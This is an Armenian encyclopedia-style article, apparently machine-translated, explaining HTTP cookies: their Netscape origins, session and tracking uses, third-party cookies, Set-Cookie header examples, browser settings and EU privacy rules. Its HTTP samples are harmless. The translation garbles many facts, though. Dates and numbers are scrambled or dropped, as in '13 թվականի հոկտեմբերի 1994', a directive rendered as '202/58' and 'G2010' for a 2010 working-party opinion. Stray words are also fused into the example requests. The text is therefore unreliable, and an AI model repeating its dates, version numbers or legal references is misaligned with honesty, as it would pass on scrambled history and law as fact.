in Սահմանումներ, Wiki

Ինտերնետ թխուկ. ինչ է դա: Սահմանում, ծագում, տեսակներ և գաղտնիություն

Ո՞րն է թխուկի դերը, ի՞նչ է այն և որո՞նք են թխուկների տեսակները: 🍪

56.3k Դիտումներ 384 Քվեարկել

Ինտերնետ թխուկ. ինչ է դա: Սահմանում, ծագում, տեսակներ և գաղտնիություն
Ինտերնետ թխուկ. ինչ է դա: Սահմանում, ծագում, տեսակներ և գաղտնիություն

Un թխուկ կամ վեբ թխուկ (Կամ թխվածքաբլիթ, կրճատ՝ որպես վկա Քվեբեկում) HTTP կապի արձանագրությամբ սահմանվում է որպես HTTP սերվերի կողմից HTTP հաճախորդին ուղարկված տեղեկատվության հաջորդականություն, որը վերջինս վերադարձնում է ամեն անգամ, երբ նույն HTTP սերվերը որոշակի պայմաններում հարցվում է:

Թխուկը համարժեք է a տերմինալում պահվող փոքր տեքստային ֆայլ ինտերնետ օգտագործողի կողմից: Գոյություն ունենալով ավելի քան 20 տարի, դրանք թույլ են տալիս կայքերի մշակողներին պահպանել օգտատերերի տվյալները՝ նրանց նավիգացիան հեշտացնելու և որոշակի գործառույթներ թույլ տալու համար: Թխուկները միշտ եղել են քիչ թե շատ հակասական, քանի որ դրանք պարունակում են մնացորդային անձնական տեղեկություններ, որոնք կարող են շահագործվել երրորդ անձանց կողմից:

Այն որպես HTTP վերնագիր ուղարկվում է վեբ սերվերի կողմից վեբ բրաուզերին, որը վերադարձնում է այն անփոփոխ ամեն անգամ, երբ մուտք է գործում սերվեր: Թխուկը կարող է օգտագործվել նույնականացում, նիստ (պետական ​​պահպանում), իսկ համար պահպանել օգտագործողի մասին հատուկ տեղեկատվություն, օրինակ՝ կայքի նախապատվությունները կամ էլեկտրոնային գնումների զամբյուղի պարունակությունը: Թխուկ տերմինը առաջացել է կախարդական թխվածքաբլիթ, հայտնի հայեցակարգ UNIX հաշվում, որը ոգեշնչեց բրաուզերի թխուկների գաղափարն ու անվանումը։ Գոյություն ունեն թխուկների մի քանի այլընտրանքներ, որոնցից յուրաքանչյուրն ունի իր կիրառությունը, առավելություններն ու թերությունները:

Լինելով պարզ տեքստային ֆայլեր՝ թխուկները գործարկելի չեն: Նրանք չեն ոչ լրտեսող ծրագրեր, ոչ վիրուսներ, չնայած որոշ կայքերի թխուկները հայտնաբերվում են բազմաթիվ հակավիրուսային ծրագրերի կողմից, քանի որ դրանք թույլ են տալիս օգտատերերին հետևել մի քանի կայքեր այցելելիս: 

Ժամանակակից բրաուզերների մեծ մասը թույլ է տալիս օգտվողներին որոշել՝ ընդունել կամ մերժել թխուկները. Օգտագործողները կարող են նաև ընտրեք, թե որքան ժամանակ են պահվում թխուկները. Այնուամենայնիվ, թխուկների ամբողջական մերժումը որոշ կայքեր դարձնում է անօգտագործելի: Օրինակ՝ պահեք գնումների զամբյուղներ կամ կայքեր, որոնք պահանջում են մուտք գործել՝ օգտագործելով հավատարմագրերը (օգտանուն և գաղտնաբառ):

Բովանդակության աղյուսակը

Պատմական

Տերմինը բուլկի բխում է անգլերեն տերմինից կախարդական թխվածքաբլիթ, որը տվյալների փաթեթ է, որը ծրագիրը ստանում և վերադարձնում է անփոփոխ: Թխուկներն արդեն օգտագործվել են ՏՏ ոլորտում, երբ Լու Մոնտուլի գաղափար ուներ դրանք օգտագործել վեբ հաղորդակցության մեջ հունիսին: Այդ ժամանակ նա աշխատանքի էր ընդունվել Netscape Communications-ում, որը մշակել էր էլեկտրոնային առևտրի հավելված հաճախորդների համար։ Թխուկները լուծում են տվել խանութի վիրտուալ զամբյուղի ներդրման հուսալիության խնդրին։

Ջոն Ջաննանդրեան և Լու Մոնտուլլին նույն թվականին գրել են Netscape-ի առաջին թխուկների ճշգրտումը: Mosaic Netscape-ի 0.9 բետա տարբերակը, թողարկվել է 13 թվականի հոկտեմբերի 1994-ին, ինտեգրված թխուկների տեխնոլոգիա (տես գրառումը) Թխուկների առաջին (ոչ փորձարարական) օգտագործումը եղել է որոշելու համար, թե արդյոք Netscape կայքի այցելուները նախկինում այցելել են կայք: Montulli-ն արտոնագրային հայտ ներկայացրեց թխուկների տեխնոլոգիայի համար 1995-ին, և ԱՄՆ-ի արտոնագիրը տրվեց 5774670: տրվել է 1998թ.

0.9 թվականին Netscape 1994 բետա տարբերակում ներդրվելուց հետո քուքիները ինտեգրվել են Internet Explorer 2-ում, որը թողարկվել է 1995 թվականի հոկտեմբերին։

Թխուկների ներմուծումը դեռ լայնորեն հայտնի չէ հանրությանը: Մասնավորապես, բրաուզերի կարգավորումներում լռելյայն ընդունվում էին թխուկները, որոնց ներկայության մասին օգտատերերը տեղեկացված չէին: Որոշ մարդիկ տեղյակ էին թխուկների գոյության մասին մոտ 1995 թվականի առաջին եռամսյակում, սակայն լայն հասարակությունը սկսեց դրանց գոյության մասին միայն այն բանից հետո, երբ Financial Times-ը հրապարակեց հոդված 12 թվականի փետրվարի 1996-ին: Նույն տարում թխուկները արժանացան լրատվամիջոցների մեծ ուշադրությանը: գաղտնիության հնարավոր ներխուժման պատճառով: Թխուկների թեման քննարկվել է Ամերիկյան դաշնային առևտրի հանձնաժողովի երկու խորհրդակցությունների ժամանակ՝ 1996 և 1997 թվականներին:

Թխուկների պաշտոնական ճշգրտման մշակումն արդեն ընթացքի մեջ էր: Պաշտոնական ճշգրտման առաջին քննարկումները տեղի ունեցան 1995 թվականի ապրիլին www-talk փոստային ցուցակում: Ձևավորվել է IETF-ի հատուկ աշխատանքային խումբ։ Երկու այլընտրանքային առաջարկ HTTP գործարքների մեջ պետական ​​ներմուծման համար առաջարկվել են համապատասխանաբար Բրայան Բեհլենդորֆի և Դեյվիդ Քրիստոլի կողմից, սակայն խումբը, անձամբ Քրիստոլի գլխավորությամբ, որոշել է օգտագործել Netscape-ի հստակեցումը որպես ելակետ: 1996 թվականի փետրվարին աշխատանքային խումբը որոշեց, որ երրորդ կողմի թխուկները զգալի սպառնալիք են գաղտնիության համար: Խմբի կողմից պատրաստված հստակեցումը ի վերջո հրապարակվեց որպես RFC 2109.

2014 թվականի վերջից մենք բազմաթիվ կայքերում տեսնում ենք թխուկների մասին պաստառ։ Գոյություն ունի զննարկչի առնվազն մեկ ընդլայնում, որը թույլ է տալիս դրոշը ցուցադրված չէ.

Թխուկների տեսակները և օգտագործումը

Նիստի կառավարում

Թխուկները կարող են օգտագործվել նավարկության ընթացքում, ինչպես նաև բազմաթիվ այցելությունների ընթացքում օգտատերերի տվյալները պահպանելու համար: Թխուկները ներկայացվել են էլեկտրոնային գնումների զամբյուղների ներդրման միջոց ապահովելու համար, վիրտուալ սարք, որտեղ օգտատերը կարող է կուտակել այն իրերը, որոնք ցանկանում է գնել կայքը զննարկելիս:

Մեր օրերում գնումների սայլակների նման հավելվածները փոխարենը պահում են տարրերի ցանկը տվյալների բազայում սերվերի վրա, ինչը նախընտրելի է. քան դրանք բուն cookie-ում պահելը: Վեբ սերվերը ուղարկում է թխուկ, որը պարունակում է եզակի նստաշրջանի ID: Այնուհետև վեբ զննարկիչը վերադարձնում է այս նստաշրջանի ID-ն յուրաքանչյուր հաջորդ հարցման դեպքում, և զամբյուղի տարրերը պահվում և կապված են այս նույն եզակի նստաշրջանի ID-ի հետ:

Թխուկների հաճախակի օգտագործումը օգտակար է հավատարմագրերի միջոցով կայք մուտք գործելու համար: Մի խոսքով, վեբ սերվերը նախ ուղարկում է թխուկ, որը պարունակում է եզակի նստաշրջանի ID: Այնուհետև օգտվողները տրամադրում են իրենց հավատարմագրերը (սովորաբար օգտվողի անուն և գաղտնաբառ): Այնուհետև վեբ հավելվածը վավերացնում է նիստը և թույլ է տալիս օգտվողին մուտք գործել ծառայություն:

անհատականացման

Քուքիները կարող են օգտագործվել կայքի օգտատիրոջ մասին տեղեկությունները հիշելու համար, որպեսզի հետագայում նրան համապատասխան բովանդակություն ցույց տան: Օրինակ, վեբ սերվերը կարող է ուղարկել թխուկ, որը պարունակում է վերջին օգտանունը, որն օգտագործվել է այդ կայք մուտք գործելու համար, որպեսզի օգտագործողի անունը հնարավոր լինի նախապես լրացնել հետագա այցելությունների ժամանակ:

Շատ կայքեր օգտագործում են թխուկներ՝ օգտատերերի նախասիրությունների հիման վրա անհատականացնելու համար: Օգտագործողները ձևով ընտրում են իրենց նախապատվությունները և դրանք ներկայացնում սերվերին: Սերվերը կոդավորում է նախապատվությունները թխուկի մեջ և այն հետ է ուղարկում զննարկիչին: Հետագայում, ամեն անգամ, երբ օգտատերը մուտք է գործում այս կայքի որևէ էջ, զննարկիչը վերադարձնում է թխուկը և, հետևաբար, նախապատվությունների ցանկը. այնուհետև սերվերը կարող է հարմարեցնել էջը ըստ օգտագործողի նախասիրությունների: Օրինակ՝ Վիքիպեդիայի կայքը թույլ է տալիս իր օգտատերերին ընտրել իրենց նախընտրած կայքի մաշկը։ Google որոնողական համակարգը թույլ է տալիս իր օգտատերերին (նույնիսկ եթե նրանք գրանցված չեն) ընտրել արդյունքների քանակը, որը նրանք ցանկանում են տեսնել յուրաքանչյուր արդյունքների էջում:

Հետևում

Հետևող թխուկներն օգտագործվում են համացանցից օգտվողների զննարկման սովորություններին հետևելու համար: Դա կարելի է նաև մասամբ անել՝ օգտագործելով համակարգչի IP հասցեն՝ հարցում կատարելով էջի համար կամ օգտագործելով «ուղղորդող» HTTP վերնագիրը, որը հաճախորդը ուղարկում է յուրաքանչյուր հարցումով, սակայն թխուկները թույլ են տալիս ավելի մեծ ճշգրտություն: Դա կարելի է անել ինչպես հետևյալ օրինակում.

  1. Եթե ​​օգտատերը կայքի էջ է կանչում, և հարցումը չի պարունակում թխուկ, սերվերը ենթադրում է, որ սա օգտատիրոջ այցելած առաջին էջն է: Այնուհետև սերվերը ստեղծում է պատահական տող և այն ուղարկում բրաուզերին՝ պահանջվող էջի հետ միասին:
  2. Այս պահից բլիթն ավտոմատ կերպով կուղարկվի բրաուզերի կողմից ամեն անգամ, երբ կայքի նոր էջ կանչվի: Սերվերը կուղարկի էջը, ինչպես միշտ, բայց նաև կգրանցի կանչված էջի URL-ը, հարցման ամսաթիվը, ժամը և թխուկը գրանցամատյանում:

Դիտելով գրանցամատյանի ֆայլը՝ այնուհետև հնարավոր է տեսնել, թե որ էջերն է օգտատերը այցելել և ինչ հերթականությամբ: Օրինակ, եթե ֆայլը պարունակում է մի քանի հարցումներ, որոնք արվել են id=abc թխուկի միջոցով, դա կարող է հաստատել, որ այս բոլոր հարցումները գալիս են միևնույն օգտվողից: Հայցվող URL-ը, հարցումների հետ կապված ամսաթիվը և ժամը թույլ են տալիս հետևել օգտվողի զննարկմանը:

Երրորդ կողմի թխուկները և վեբ փարոսները, որոնք բացատրվում են ստորև, լրացուցիչ հնարավորություն են տալիս հետևել տարբեր կայքերում: Միայնակ կայքի հետևումը սովորաբար օգտագործվում է վիճակագրական նպատակներով: Ի հակադրություն, երրորդ կողմի թխուկների միջոցով տարբեր կայքերում հետևելը սովորաբար օգտագործվում է գովազդային ընկերությունների կողմից՝ անանուն օգտատերերի պրոֆիլներ ստեղծելու համար (որոնք այնուհետև օգտագործվում են որոշելու, թե որ գովազդը պետք է ցուցադրվի օգտատերին, ինչպես նաև նրան այդ գովազդներին համապատասխան էլ-նամակներ ուղարկելու համար՝ SPAM): )

Հետևող քուքիները օգտատերերի գաղտնիության ներխուժման վտանգ են ներկայացնում, սակայն դրանք հեշտությամբ կարող են ջնջվել: Ժամանակակից բրաուզերների մեծ մասը ներառում է հավելվածը փակելիս մշտական ​​թխուկները ավտոմատ կերպով ջնջելու տարբերակ:

Երրորդ կողմի թխուկներ

Պատկերները և վեբ էջում պարունակվող այլ օբյեկտները կարող են գտնվել էջը հյուրընկալող սերվերներից տարբերվող սերվերների վրա: Էջը ցուցադրելու համար զննարկիչը ներբեռնում է այս բոլոր օբյեկտները: Կայքերի մեծ մասը պարունակում է տեղեկատվություն տարբեր աղբյուրներից: Օրինակ, եթե ձեր դիտարկիչում մուտքագրեք www.example.com, էջի մի մասում հաճախ կլինեն օբյեկտներ կամ գովազդներ, որոնք գալիս են տարբեր աղբյուրներից, այսինքն՝ այլ տիրույթից, քան www. .example.com-ը: «Առաջին» կողմի թխուկները թխուկներ են, որոնք սահմանված են դիտարկիչի հասցեագոտում նշված տիրույթի կողմից: Երրորդ կողմի թխուկները տեղադրվում են էջի օբյեկտներից մեկի կողմից, որը գալիս է այլ տիրույթից:

Լռելյայնորեն, բրաուզերները, ինչպիսիք են Mozilla Firefox-ը, Microsoft Internet Explorer-ը և Opera-ն, ընդունում են երրորդ կողմի թխուկները, սակայն օգտատերերը կարող են փոխել զննարկչի ընտրանքների կարգավորումները՝ դրանք արգելափակելու համար: Երրորդ կողմի քուքիները, որոնք թույլ են տալիս վեբ ֆունկցիոնալությունը, անվտանգության վտանգ չկա, սակայն դրանք օգտագործվում են նաև օգտվողներին հետևելու համար: կայքից կայք.

Գործիքները, ինչպիսին է Ghostery-ը, որը հասանելի է բոլոր բրաուզերների համար, ներառյալ Google Chrome-ը, կարող են արգելափակել փոխանակումները երրորդ կողմերի միջև:

Իրականացում

Հնարավոր փոխազդեցություն վեբ բրաուզերի և վեբ էջը հյուրընկալող սերվերի միջև: Սերվերը թխուկ է ուղարկում դիտարկիչին, իսկ զննարկիչը այն հետ է ուղարկում, երբ զանգում է մեկ այլ էջ:
Հնարավոր փոխազդեցություն վեբ բրաուզերի և վեբ էջը հյուրընկալող սերվերի միջև: Սերվերը թխուկ է ուղարկում դիտարկիչին, իսկ զննարկիչը այն հետ է ուղարկում, երբ զանգում է մեկ այլ էջ:

Թխուկները վեբ սերվերի կողմից զննարկիչին ուղարկված տվյալների փոքր կտորներ են: Զննարկիչը դրանք վերադարձնում է սերվերին անփոփոխ՝ ներմուծելով վիճակը (անցյալ իրադարձությունների հիշողությունը) այլապես քաղաքացիություն չունեցող HTTP գործարքի մեջ: Առանց թխուկների, վեբ էջի կամ վեբ էջի բաղադրիչի յուրաքանչյուր առբերում մեկուսացված իրադարձություն է՝ անկախ նույն կայքին արված այլ հարցումներից: Բացի վեբ սերվերի կողմից սահմանվելու հնարավորությունից, թխուկները կարող են սահմանվել նաև սկրիպտային լեզուներով, ինչպիսին է JavaScript-ը, եթե զննարկիչը աջակցում և լիազորում է:

Թխուկների պաշտոնական ճշգրտումը հուշում է, որ բրաուզերները պետք է կարողանան պահպանել և նորից ուղարկել նվազագույն թվով թխուկներ: Մասնավորապես, զննարկիչը պետք է կարողանա պահել առնվազն 300 թխուկ՝ յուրաքանչյուրը չորս կիլոբայթով և առնվազն 20 թխուկ մեկ սերվերի կամ տիրույթի համար:

Համաձայն 3.1 բաժնի RFC 2965, թխուկների անունները մեծատառերի նկատմամբ զգայուն չեն:

Թխուկը կարող է նշել դրա ժամկետի ավարտի ամսաթիվը, որի դեպքում թխուկը կջնջվի այս ամսաթվին: Եթե ​​թխուկը չի նշում պիտանելիության ժամկետ, ապա թխուկը ջնջվում է հենց որ օգտատերը հեռանա իր բրաուզերից: Հետևաբար, վավերականության ժամկետը նշելը միջոց է թխուկին գոյատևելու մի քանի նիստերի միջոցով: Այս պատճառով, ասվում է, որ պիտանիության ժամկետ ունեցող թխուկները կան համառ. Ծրագրի օրինակ. մանրածախ կայքը կարող է օգտագործել մշտական ​​թխուկներ՝ գրանցելու այն ապրանքները, որոնք օգտատերերը տեղադրել են իրենց զամբյուղում (իրականում, թխուկը կարող է վերաբերել վաճառքի կայքի տվյալների բազայում պահված մուտքին, այլ ոչ թե ձեր համակարգչում) . Այս միջոցով, եթե օգտատերերը լքեն իրենց բրաուզերը առանց գնումներ կատարելու և ավելի ուշ վերադառնան դրան, նրանք կկարողանան նորից գտնել զամբյուղի իրերը: Եթե ​​այս թխուկները չնշեին պիտանելիության ժամկետը, ապա դրանք կսպառվեր, երբ զննարկիչը փակվեր, և զամբյուղի պարունակության մասին տեղեկատվությունը կկորչի:

Քուքիները կարող են սահմանափակվել որոշակի տիրույթով, ենթադոմեյնով կամ դրանք ստեղծած սերվերի ուղով:

Վեբ էջերի փոխանցումը կատարվում է HyperText Transfer Protocol-ի (HTTP) միջոցով: Անտեսելով թխուկները՝ բրաուզերները վեբ սերվերներից էջ են կանչում՝ ընդհանուր առմամբ նրանց ուղարկելով կարճ տեքստ, որը կոչվում է HTTP հարցում. Օրինակ՝ www.example.org/index.html էջ մուտք գործելու համար բրաուզերները միանում են www.example.org սերվերին և ուղարկում հարցում, որն ունի հետևյալ տեսքը.

GET /index.html HTTP/1.1Հոսթ՝ www.example.org
ծովագնացserveur

Սերվերը պատասխանում է՝ ուղարկելով պահանջվող էջը, որին նախորդում է նմանատիպ տեքստ, ամբողջ էությունը կանչված HTTP արձագանք. Այս փաթեթը կարող է պարունակել տողեր, որոնք հրահանգում են զննարկիչին պահել թխուկները.

HTTP/1.1 200 OK Բովանդակության տեսակ՝ text/htmlSet-Cookie՝ name=value
(HTML էջ)
ծովագնացserveur

Սերվերը ուղարկում է միայն Set-Cookie գիծը, եթե սերվերը ցանկանում է, որ զննարկիչը պահի թխուկ: Set-Cookie-ը բրաուզերի համար խնդրանք է՝ պահպանելու name=value տողը և վերադարձնելու այն սերվերին բոլոր ապագա հարցումներում: Եթե ​​զննարկիչը աջակցում է թխուկներին, և թխուկները միացված են դիտարկիչի ընտրանքներում, ապա թխուկը կներառվի նույն սերվերին ուղղված բոլոր հետագա հարցումներում: Օրինակ, զննարկիչը կոչում է էջը www.example.org/news.html՝ ուղարկելով հետևյալ հարցումը www.example.org սերվերին.

GET /news.html HTTP/1.1Հոսթ՝ www.example.orgCookie՝ name=value Ընդունել՝ */*
ծովագնացserveur

Սա նույն սերվերից մեկ այլ էջի հարցում է և տարբերվում է վերը նշվածից, քանի որ այն պարունակում է տող, որը սերվերը նախկինում ուղարկել է զննարկիչին: Այս միջոցի շնորհիվ սերվերը գիտի, որ այս հարցումը կապված է նախորդի հետ: Սերվերը պատասխանում է՝ ուղարկելով կանչված էջը, ինչպես նաև դրան ավելացնելով այլ թխուկներ։

Քուքիի արժեքը կարող է փոփոխվել սերվերի կողմից՝ ուղարկելով նոր տող Set-Cookie՝ name=new_value՝ ի պատասխան կանչված էջի: Այնուհետև զննարկիչը փոխարինում է հին արժեքը նորով:

Set-Cookie գիծը սովորաբար ստեղծվում է CGI ծրագրի կամ սկրիպտավորման այլ լեզվով, այլ ոչ թե HTTP սերվերի կողմից: HTTP սերվերը (օրինակ՝ Apache) զննարկիչին կփոխանցի միայն ծրագրի արդյունքը (փաստաթուղթ, որին նախորդում է բլիթները պարունակող վերնագիրը):

Թխուկները կարող են սահմանվել նաև JavaScript-ի կամ այլ նմանատիպ լեզուներով, որոնք աշխատում են դիտարկիչում, այսինքն՝ հաճախորդի կողմից, այլ ոչ թե սերվերի կողմից: JavaScript-ում այդ նպատակով օգտագործվում է document.cookie օբյեկտը: Օրինակ, document.cookie = «temperature=20» հայտարարագիրը ստեղծում է «temperature» անունով թխուկ և 20 արժեքով:

google.com-ից HTTP պատասխանի օրինակ, որը սահմանում է ատրիբուտներով թխուկ:
google.com-ից HTTP պատասխանի օրինակ, որը սահմանում է ատրիբուտներով թխուկ:

Բացի անուն/արժեք զույգից, թխուկը կարող է նաև պարունակել պիտանելիության ժամկետ, ուղի, տիրույթի անուն և նախատեսված կապի տեսակը, այսինքն՝ նորմալ կամ կոդավորված: RFC 2965-ը նաև սահմանում է, որ թխուկները պետք է ունենան պարտադիր տարբերակի համար, սակայն դա սովորաբար բաց է թողնվում: Տվյալների այս մասերը հետևում են name=new_value զույգին և բաժանվում են ստորակետերով: Օրինակ, քուքի կարող է ստեղծվել սերվերի կողմից՝ ուղարկելով Set-Cookie տող՝ name=new_value; ժամկետը լրանում է=ամսաթիվ; ճանապարհ=/; domain=.example.org.

Քուքիների ժամկետը սպառվում է և այնուհետև զննարկիչը չի ուղարկում սերվեր հետևյալ իրավիճակներում.

  • Երբ զննարկիչը փակ է, եթե թխուկը մշտական ​​չէ:
  • Երբ թխուկների պիտանելիության ժամկետն ավարտվի:
  • Երբ թխուկների պիտանելիության ժամկետը (սերվերի կամ սցենարի կողմից) փոխվում է անցյալի ամսաթվի:
  • Երբ զննարկիչը ջնջում է թխուկը օգտատիրոջ խնդրանքով:

Երրորդ իրավիճակը թույլ է տալիս սերվերներին կամ սկրիպտներին բացահայտորեն ջնջել թխուկը: Նկատի ունեցեք, որ Google Chrome վեբ բրաուզերի միջոցով հնարավոր է իմանալ որոշակի թխուկի գործողության ժամկետը՝ մուտք գործելով բովանդակության կարգավորումներ: Համակարգչում պահված թխուկը կարող է այնտեղ մնալ մի քանի տասնամյակ, եթե այն ջնջելու ընթացակարգ չձեռնարկվի:

Կարծրատիպեր

Ինտերնետում դրանց ներդրումից ի վեր, թխուկների մասին բազմաթիվ գաղափարներ են տարածվել համացանցում և լրատվամիջոցներում: 1998 թվականին CIAC-ը՝ Միացյալ Նահանգների Էներգետիկայի դեպարտամենտի համակարգչային միջադեպերի մոնիտորինգի թիմը, որոշեց, որ թխուկների անվտանգության խոցելիությունը «ըստ էության գոյություն չուներ» և բացատրեց, որ «տեղեկատվություն ձեր այցելությունների ծագման և ձեր այցելած վեբ էջերի մանրամասների մասին։ արդեն գոյություն ունեն վեբ սերվերների գրանցամատյանների ֆայլերում»: 2005 թվականին Jupiter Research-ը հրապարակեց ուսումնասիրության արդյունքները, որոնցում հարցվածների զգալի տոկոսը հաշվի էր առել հետևյալ պնդումները.

  • Թխվածքաբլիթները նման են վիրուս, դրանք վարակում են օգտատերերի կոշտ սկավառակները։
  • Թխուկները առաջացնում են pop-up.
  • Թխուկները օգտագործվում են ուղարկելու համար սպամի.
  • Թխուկները օգտագործվում են միայն գովազդի համար:

Քուքիները չեն կարող ջնջել կամ կարդալ օգտատիրոջ համակարգչից տեղեկատվությունը: Այնուամենայնիվ, թխուկները հնարավորություն են տալիս հայտնաբերել օգտատիրոջ այցելած վեբ էջերը տվյալ կայքում կամ կայքերի մի շարքում: Այս տեղեկատվությունը կարող է հավաքվել օգտվողի պրոֆիլում, որը կարող է օգտագործվել կամ վերավաճառվել երրորդ կողմերին, ինչը կարող է գաղտնիության լուրջ խնդիրներ առաջացնել: Որոշ պրոֆիլներ անանուն են, այն իմաստով, որ դրանք անձնական տեղեկություններ չեն պարունակում, սակայն նույնիսկ այդպիսի պրոֆիլները կարող են կասկածելի լինել:

Ըստ նույն հետազոտության՝ համացանցից օգտվողների մեծ տոկոսը չգիտի, թե ինչպես ջնջել թխուկները։ Մարդկանց քուքիներին չվստահելու պատճառներից մեկն այն է, որ որոշ կայքեր չարաշահել են թխուկների անձնական նույնականացման ասպեկտը և տարածել այս տեղեկատվությունը այլ աղբյուրների հետ: Թիրախային գովազդի և չպահանջված էլ.փոստի մեծ տոկոսը, որը համարվում է սպամ, գալիս է թխուկների հետևումից ստացված տեղեկություններից:

Բրաուզերի կարգավորումներ

Բրաուզերների մեծ մասն աջակցում է թխուկներին և թույլ է տալիս օգտվողին անջատել դրանք: Ամենատարածված տարբերակներն են.

  • Ամբողջովին միացնել կամ անջատել թխուկները, որպեսզի դրանք մշտապես ընդունվեն կամ արգելափակվեն:
  • Թույլ տվեք օգտվողին տեսնել ակտիվ թխուկները տվյալ էջում՝ մուտքագրելով javascript. alert(document.cookie) բրաուզերի հասցեագոտում: Որոշ բրաուզերներ ներառում են թխուկների կառավարիչ օգտվողի համար, որը կարող է դիտել և ընտրովի ջնջել բրաուզերի կողմից պահվող թխուկները:

Բրաուզերների մեծ մասը նաև թույլ է տալիս ամբողջությամբ ջնջել անձնական տվյալները, որոնք ներառում են թխուկներ: Գոյություն ունեն նաև թխուկների թույլտվությունները վերահսկելու լրացուցիչ մոդուլներ:

Գաղտնիություն և երրորդ կողմի թխուկներ

Այս ֆիկտիվ օրինակում գովազդային ընկերությունը երկու վեբկայքերում տեղադրել է պաստառներ։ Վահանակները տեղադրելով իր սերվերներում և օգտագործելով երրորդ կողմի թխուկներ՝ գովազդային ընկերությունը կարողանում է հետևել օգտատերերի նավարկությանը այս երկու կայքերի միջոցով:

Թխուկները կարևոր հետևանքներ ունեն վեբ օգտատերերի գաղտնիության և անանունության համար: Թեև քուքիները հետ են ուղարկվում միայն դրանք սահմանած սերվերին կամ նույն ինտերնետային տիրույթին պատկանող սերվերին, այնուամենայնիվ, վեբ էջը կարող է պարունակել պատկերներ կամ այլ բաղադրիչներ, որոնք պահվում են այլ տիրույթներին պատկանող սերվերներում: Թխուկները, որոնք տեղադրվում են այս արտաքին բաղադրիչների վերականգնման ժամանակ, կոչվում են երրորդ կողմի թխուկներ. Սա ներառում է թխուկներ անցանկալի թռուցիկ պատուհաններից:

Գովազդային ընկերություններն օգտագործում են երրորդ կողմի թխուկներ՝ օգտատերերին հետևելու իրենց այցելած տարբեր կայքերում: Մասնավորապես, գովազդային ընկերությունը կարող է հետևել օգտվողին բոլոր այն էջերում, որտեղ տեղադրել է գովազդային պատկերներ կամ հետևող պիքսել: Օգտագործողի այցելած էջերի իմացությունը գովազդային ընկերությանը թույլ է տալիս թիրախավորել օգտատիրոջ գովազդային նախասիրությունները:

Օգտվողի պրոֆիլ ստեղծելու ունակությունը որոշների կողմից համարվում է գաղտնիության ներխուժում, հատկապես, երբ հետագծումն իրականացվում է տարբեր տիրույթներում՝ օգտագործելով երրորդ կողմի թխուկները: Այդ պատճառով որոշ երկրներ ունեն թխուկների մասին օրենսդրություն:

Միացյալ Նահանգների կառավարությունը թխուկների տեղադրման խիստ կանոններ կիրառեց 2000 թվականին, այն բանից հետո, երբ պարզվեց, որ Սպիտակ տան դեղերի քաղաքականության գրասենյակը թխուկներ է օգտագործում՝ հետևելու օգտատերերի համակարգիչներին, ովքեր դիտում են թմրամիջոցների առցանց գովազդը: 2002 թվականին գաղտնիության պաշտպանության ակտիվիստ Դենիել Բրանդտը հայտնաբերեց, որ ԿՀՎ-ն մշտական ​​թխուկներ է թողնում իր կայքերն այցելած համակարգիչների վրա: Այս խախտման մասին տեղեկացվելուց հետո ԿՀՎ-ն հայտարարեց, որ այդ թխուկները միտումնավոր չեն ուղարկվել և դադարեցրեց դրանց կարգավորումը: 25 թվականի դեկտեմբերի 2005-ին Բրանդտը հայտնաբերեց, որ Ազգային անվտանգության գործակալությունը (NSA) այցելուների համակարգիչների վրա թողել է երկու մշտական ​​թխուկ՝ ծրագրային ապահովման թարմացման պատճառով: Տեղեկացվելուց հետո NSA-ն անմիջապես անջատել է թխուկները:

Միացյալ Թագավորությունում Cookie օրենք մայիսի 25-ին ուժի մեջ մտած, կայքերին պարտավորեցնում է հայտարարել իրենց մտադրությունների մասին՝ այդպիսով թույլ տալով օգտատերերին ընտրել՝ ցանկանու՞մ են համացանցում իրենց անցման հետքերը թողնել, թե ոչ։ Այսպիսով, նրանք կարող են պաշտպանվել գովազդի թիրախավորումից: Այնուամենայնիվ, համաձայն The Guardian, Ինտերնետից օգտվողների համաձայնությունը պարտադիր չէ, որ հստակ լինի. փոփոխություններ են կատարվել օգտատերերի համաձայնության պայմաններում՝ կատարելով այն այսպիսով ենթադրվում է.

Գաղտնիության 2002/58 հրահանգ

Գաղտնիության և էլեկտրոնային հաղորդակցության 202/58 հրահանգը պարունակում է թխուկների օգտագործման կանոններ: Մասնավորապես, սույն հրահանգի 5-րդ հոդվածի 3-րդ կետը պահանջում է, որ տվյալների (օրինակ՝ թխուկների) պահպանումը օգտատիրոջ համակարգչում կարող է կատարվել միայն այն դեպքում, եթե՝

  • օգտագործողը տեղեկացված է, թե ինչպես են օգտագործվում տվյալները.
  • օգտագործողին հնարավորություն է տրվում հրաժարվել պահեստավորման այս գործողությունից: Սակայն այս հոդվածում նշվում է նաև, որ տեխնիկական պատճառներով տվյալների պահպանումն ազատված է սույն օրենքից:

2003թ. հոկտեմբերից կիրարկվելու պատճառով հրահանգը, սակայն, շատ թերի է կիրառվել 2004թ. դեկտեմբերի զեկույցի համաձայն, որը նաև նշում էր, որ որոշ անդամ երկրներ (Սլովակիա, Լատվիա, Հունաստան, Բելգիա և Լյուքսեմբուրգ) դեռևս չեն փոխանցել օրինագիծը: հրահանգը ներպետական ​​օրենսդրության մեջ:

29 թվականին G2010-ի կարծիքի համաձայն, այս հրահանգը, որը հատկապես պայմանավորում է քուքիների օգտագործումը վարքագծային գովազդի նպատակներով, ինտերնետ օգտագործողի բացահայտ համաձայնությամբ, շարունակում է վատ կիրառվել: Իրականում, կայքերի մեծ մասը դա անում է հրահանգին չհամապատասխանող եղանակով՝ սահմանափակվելով «քուքիների» օգտագործման մասին պարզ «ազդանշանով»՝ առանց օգտագործման մասին տեղեկություններ տալու, առանց «տեխնիկական» թխուկների միջև տարբերակման: «հետագծող» թխուկներ, ոչ էլ իրական ընտրություն առաջարկել օգտատիրոջը, ով ցանկանում է պահպանել տեխնիկական բլիթները (օրինակ՝ զամբյուղի կառավարման թխուկները) և հրաժարվել «հետևել» թխուկներից: Փաստորեն, շատ կայքեր ճիշտ չեն գործում, եթե թխուկները մերժվում են, ինչը չի համապատասխանում 2002/58 հրահանգին կամ 95/46 հրահանգին (Անձնական տվյալների պաշտպանություն):

Հրահանգ 2009/136 / ԵՀ

